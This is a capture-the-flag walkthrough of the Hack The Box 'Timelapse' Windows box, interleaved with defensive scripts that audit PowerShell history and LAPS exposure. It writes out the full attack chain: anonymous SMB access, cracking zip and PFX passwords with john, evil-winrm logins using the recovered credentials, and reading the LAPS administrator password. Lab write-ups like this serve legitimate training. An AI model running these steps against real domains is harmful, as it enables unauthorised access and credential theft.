root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


Box: Timelapse

Level: Easy

OS: Windows


Let's get started

Recon

Portscanning

command:sudo nmap -A 10.129.227.105 -T4 -v -p-

Nmap scan report for 10.129.227.105
Host is up (0.24s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-26 05:11:48Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
| MD5:   e233a19945040859013fb9c5e4f691c3
|_SHA-1: 5861acf776b8703fd01ee25dfc7c9952a4477652
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2023-09-26T05:13:28+00:00; +7h59m58s from scanner time.
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
64129/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s
| smb2-time: 
|   date: 2023-09-26T05:12:52
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   279.92 ms 10.10.14.1
2   280.01 ms 10.129.227.105

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 25 22:13:37 2023 -- 1 IP address (1 host up) scanned in 406.16 seconds

From our nmap scan we have quite a number of open ports. Our enumeration today will actually be focused on the port running the smb service, that is, port 445, also the port running the http service, that is, port 5986.

Enumeration (Port 445)

Let's start by listing the shares available on the SMB server.

command:smbclient -L 10.129.227.105

Since we have no password, just hit the Enter key.

┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ smbclient -L 10.129.227.105      
Password for [WORKGROUP\bl4ck4non]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.227.105 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

There are 6 shares on this server. The most interesting one is the share named Shares.

Let's connect to this share to see what it holds.

command:smbclient //10.129.227.105/Shares

Since we have no password, just hit the Enter key.

┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ smbclient //10.129.227.105/Shares
Password for [WORKGROUP\bl4ck4non]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 16:39:15 2021
  ..                                  D        0  Mon Oct 25 16:39:15 2021
  Dev                                 D        0  Mon Oct 25 20:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 16:48:42 2021

                6367231 blocks of size 4096. 1286468 blocks available
smb: \> 

Cool, we can now list the files available on the Shares share.

Navigating to the Dev directory, there's a zip file.


Let's download this file to our machine using the get command.

command:get winrm_backup.zip


Good. Now we can try to unzip the file.


A password is required but we don’t have one.

Well, I called john already and he said he will be sending one of his brothers, zip2john.

Using zip2john we'll generate a hash that can be cracked with john.

command:zip2john winrm_backup.zip > winrm.txt

command:john winrm.txt --wordlist=/home/bl4ck4non/Documents/rockyou.txt

┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ zip2john winrm_backup.zip > winrm.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ john winrm.txt  --wordlist=/home/bl4ck4non/Documents/rockyou.txt                                     
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:01 DONE (2023-09-25 22:48) 0.9259g/s 3216Kp/s 3216Kc/s 3216KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

So the password is supremelegacy. Now let's unzip.

┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx    
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ ls -l legacyy_dev_auth.pfx 
-rwxr-xr-x 1 bl4ck4non bl4ck4non 2555 Oct 25  2021 legacyy_dev_auth.pfx

Cool, the password worked and we got a PKCS#12 file.

For those who don't know, a PKCS#12 file is a cryptographic container format that typically holds a digital certificate together with its associated private key, protected by a password. These files are commonly used to distribute SSL/TLS certificates and keys, for example for web servers or for client authentication.

To inspect this file we can use the openssl command.

command:openssl pkcs12 -info -in legacyy_dev_auth.pfx

Oops, a password is required.

I called john again but he wasn't picking up his calls (he probably thinks I'm disturbing him lool). So, I called one of his brothers, pfx2john.

Using pfx2john to get the hash, then john to crack it.

command:pfx2john legacyy_dev_auth.pfx > legacyy.txt

command:john legacyy.txt --wordlist=/home/bl4ck4non/Documents/rockyou.txt

┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ pfx2john legacyy_dev_auth.pfx > legacyy.txt
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ john legacyy.txt  --wordlist=/home/bl4ck4non/Documents/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:01:42 DONE (2023-09-25 22:58) 0.009797g/s 31662p/s 31662c/s 31662C/s thuglife06..thsco04
Use the "--show" option to display all of the cracked passwords reliably

We got the password to be thuglegacy

Now that we have the password, we'll use openssl to extract the private key and the certificate; these should let us connect to the box.

command:openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem -nodes

command:openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.cert

┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem -nodes
Enter Import Password:
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.cert
Enter Import Password:
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ ls -l private.pem    
-rw------- 1 bl4ck4non bl4ck4non 1952 Sep 26 00:13 private.pem
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/Timelapse]
└─$ ls -l certificate.cert 
-rw------- 1 bl4ck4non bl4ck4non 1236 Sep 26 00:13 certificate.cert
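To make the two openssl steps above concrete, here is an added example (it is not part of the writeup and does not touch the box's files) that builds a password-protected PKCS#12 bundle from a throwaway key pair, pulls the key and certificate back out with the same `-nocerts -nodes` and `-nokeys` invocations, and then checks that the extracted key really belongs to the extracted certificate. It assumes only the openssl CLI; the file names, the CN and the passphrase are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the writeup. Round-trips a PKCS#12 bundle
# through the same openssl extraction steps and verifies the key/cert pair.

pfx_roundtrip() {
    workdir=$(mktemp -d) || return 1
    pass='demo-passphrase'   # constructed; the bundle on the box used a wordlist-crackable one

    # 1. Throwaway RSA key and self-signed certificate standing in for the bundle's contents.
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj '/CN=demo' \
        -keyout "$workdir/key.pem" -out "$workdir/cert.pem" >/dev/null 2>&1 || return 1

    # 2. Pack both into one PKCS#12 file; the passphrase is the only thing guarding it.
    openssl pkcs12 -export -inkey "$workdir/key.pem" -in "$workdir/cert.pem" \
        -out "$workdir/demo.pfx" -passout "pass:$pass" 2>/dev/null || return 1

    # 3. The writeup's extraction steps. -nodes writes the private key unencrypted,
    #    so private.pem is as sensitive as the bundle plus its passphrase.
    openssl pkcs12 -in "$workdir/demo.pfx" -nocerts -nodes -passin "pass:$pass" \
        -out "$workdir/private.pem" 2>/dev/null || return 1
    openssl pkcs12 -in "$workdir/demo.pfx" -nokeys -passin "pass:$pass" \
        -out "$workdir/certificate.cert" 2>/dev/null || return 1

    # 4. Check the pair: the public key derived from the private key must equal
    #    the public key embedded in the certificate.
    from_key=$(openssl pkey -in "$workdir/private.pem" -pubout 2>/dev/null)
    from_cert=$(openssl x509 -in "$workdir/certificate.cert" -pubkey -noout 2>/dev/null)
    rm -rf "$workdir"

    if [ -n "$from_key" ] && [ "$from_key" = "$from_cert" ]; then
        echo "key matches certificate"
        return 0
    fi
    echo "key/certificate mismatch" >&2
    return 1
}
```

The final comparison is the check worth keeping: a certificate file and a key file that do not share a public key will simply fail TLS client authentication, and it is much quicker to catch that locally than while debugging a remote connection. Note also that openssl created private.pem with mode 0600, as in the `ls -l` output above; keep it that way, since `-nodes` leaves the key in the clear.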

Cool, now we can use these to connect to the box.

Exploitation

If you recall, our nmap scan showed port 5986 open.

Port 5986 is the standard port for Windows Remote Management (WinRM) over HTTPS. WinRM is the management protocol used for remote administration and automation in Windows environments.

So we'll use the evil-winrm tool, since we have a private key and a certificate to authenticate with.

command:evil-winrm -i 10.129.227.105 -c certificate.cert -k private.pem -S

We got a user shell as legacyy😎. Let's go ahead and escalate our privileges.

Privilege Escalation

Navigating to the directory C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine, we find the PowerShell history file.

In that history file we find the user svc_deploy with the password E3R$Q62^12p7PLlC%KWaxuaV.
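Credentials typed into an interactive PowerShell session end up verbatim in PSReadLine's ConsoleHost_history.txt, which is exactly how the svc_deploy password surfaced here. As an added example (not from the writeup), the script below scans a history file for the usual tell-tale shapes: a plaintext `ConvertTo-SecureString`, a `PSCredential` constructed inline, a literal `-Password` argument, or a `net user <name> <password>` command. The sample history it writes is constructed, with placeholder values instead of any real password.

```shell
#!/bin/sh
# Added example, not code from the writeup. Flags PowerShell history lines
# that embed credentials. The history file is normally found at
#   %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Extended regexes for secrets typed on the command line (case-insensitive below).
CRED_PATTERNS='ConvertTo-SecureString[^|]*-AsPlainText|PSCredential[[:space:]]*\(|-Password[[:space:]]+[^$[:space:]]|net[[:space:]]+user[[:space:]]+[^[:space:]]+[[:space:]]+[^[:space:]/]'

# Print every offending line prefixed with its line number.
scan_history() {
    grep -inE "$CRED_PATTERNS" "$1"
}

# Constructed sample history in the shape PSReadLine writes (one command per line).
write_sample_history() {
    cat > "$1" <<'EOF'
whoami
cd C:\Users\legacyy
$p = ConvertTo-SecureString 'PLACEHOLDER_PASSWORD' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
Invoke-Command -ComputerName localhost -Credential $c -ScriptBlock { whoami }
net user svc_deploy PLACEHOLDER_PASSWORD /add
Get-ChildItem -Recurse
EOF
}

# Stand-alone run: write the sample and show what gets flagged (3 of 7 lines).
if [ "${0##*/}" != "sh" ] && [ "${0##*/}" != "bash" ]; then
    sample=$(mktemp)
    write_sample_history "$sample"
    scan_history "$sample"
    rm -f "$sample"
fi
```

Lines 3, 4 and 6 of the sample are flagged; line 5 is not, because it passes a variable rather than a literal. The same patterns work as a periodic sweep of users' PSReadLine files on jump hosts, and the fix on the operator side is to prompt with `Get-Credential` instead of typing secrets inline.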

Let's switch to this user using evil-winrm.

command:evil-winrm -u svc_deploy -i 10.129.107.247 -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Nice nice, now let's escalate our privileges further.

Running the command net user svc_deploy, I found that the user belongs to a non-standard group.

LAPS stands for "Local Administrator Password Solution." It is a Microsoft tool that automatically manages and periodically rotates the local administrator password on each domain-joined Windows computer. The attribute on an Active Directory computer object that holds the LAPS-generated password is ms-MCS-AdmPwd, and only principals granted read access to that attribute (typically a dedicated group) can see the cleartext.

In a nutshell, this means we can try to read the Administrator password from that attribute.

I used the Get-ADComputer command to do this

command:Get-ADComputer DC01 -property 'ms-MCS-AdmPwd'


We got the password of the Administrator user to be roF7N&7V[c%k&ipx7k.+3tt%
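The defender's view of the same attribute is an audit: run an LDAP query as an ordinary account and check whether ms-Mcs-AdmPwd comes back at all (if it does, read rights are too broad), and whether the companion expiration timestamp says the password should already have rotated. The script below is an added example, not part of the writeup. It parses an ldapsearch-style LDIF dump and converts ms-Mcs-AdmPwdExpirationTime, which the legacy LAPS schema stores as a Windows FILETIME (100 ns ticks since 1601-01-01 UTC); that attribute is not shown on this page but is part of the same schema as ms-Mcs-AdmPwd. The LDIF it writes is constructed, with placeholder DNs and values.

```shell
#!/bin/sh
# Added example, not code from the writeup. Audits legacy-LAPS attributes
# from an LDIF dump: is the cleartext password visible to the querying
# account, and has its expiration time already passed?

# Windows FILETIME -> Unix epoch seconds (64-bit shell arithmetic, no awk floats).
filetime_to_epoch() {
    echo $(( $1 / 10000000 - 11644473600 ))
}

# audit_laps LDIF_FILE NOW_EPOCH
# Prints one line per computer entry: <sAMAccountName> <EXPOSED|HIDDEN> <expiry-epoch> <EXPIRED|VALID>
audit_laps() {
    awk '
        function flush() {
            if (name == "") return
            print name, (pwd != "" ? "EXPOSED" : "HIDDEN"), (ft == "" ? 0 : ft)
            name = ""; pwd = ""; ft = ""
        }
        /^sAMAccountName: /              { name = substr($0, 17) }
        /^ms-Mcs-AdmPwd: /               { pwd  = substr($0, 16) }
        /^ms-Mcs-AdmPwdExpirationTime: / { ft   = substr($0, 30) }   # kept as a string
        /^$/ { flush() }
        END  { flush() }
    ' "$1" | while read -r name exposed ft; do
        epoch=$(filetime_to_epoch "$ft")
        if [ "$epoch" -lt "$2" ]; then state=EXPIRED; else state=VALID; fi
        echo "$name $exposed $epoch $state"
    done
}

# Constructed LDIF: one entry where the password attribute was returned (and is
# stale), one where the account could not read it. Names and values are placeholders.
write_sample_ldif() {
    cat > "$1" <<'EOF'
dn: CN=DC01,OU=Domain Controllers,DC=example,DC=test
sAMAccountName: DC01$
ms-Mcs-AdmPwd: PLACEHOLDER-CLEARTEXT-PASSWORD
ms-Mcs-AdmPwdExpirationTime: 132796512000000000

dn: CN=WS01,CN=Computers,DC=example,DC=test
sAMAccountName: WS01$
ms-Mcs-AdmPwdExpirationTime: 133500000000000000
EOF
}

# Stand-alone run against the sample, with "now" fixed at 1700000000 (Nov 2023).
if [ "${0##*/}" != "sh" ] && [ "${0##*/}" != "bash" ]; then
    sample=$(mktemp)
    write_sample_ldif "$sample"
    audit_laps "$sample" 1700000000
    rm -f "$sample"
fi
```

Against the sample, DC01$ reports EXPOSED and EXPIRED (its expiry converts to 1635177600, i.e. 25 October 2021) while WS01$ reports HIDDEN and VALID. Any EXPOSED line from a low-privileged query is a finding of the kind that made this box's privilege escalation possible; an EXPIRED line means the LAPS client has not rotated the password when it should have.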

Let's log in as the Administrator user using evil-winrm.

command:evil-winrm -i 10.129.107.247 -u administrator -p 'roF7N&7V[c%k&ipx7k.+3tt%' -S

We have successfully pwned this box😎

That will be all for today
